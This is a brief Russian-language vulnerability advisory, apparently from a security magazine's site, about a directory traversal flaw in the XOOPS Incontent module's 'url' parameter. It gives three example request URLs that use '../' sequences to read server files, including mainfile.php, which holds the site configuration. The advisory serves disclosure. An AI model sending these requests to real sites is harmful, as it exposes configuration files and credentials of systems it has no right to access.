Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: XOOPS Incontent module
Уязвимость позволяет удаленному
пользователю просмотреть содержимое
произвольных сценариев на уязвимой системе.
Уязвимый модуль некорректно обрабатывает
параметр url. Удаленный пользователь может
просмотреть содержимое произвольных
сценариев на системе.
Пример:
http://[target]/modules/incontent/index.php? op=aff&optio n=0&url=../../../mainfile.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../.
./index.php
http://[target]/modules/incontent/index.php? op=aff&option=0&url=../../../header.php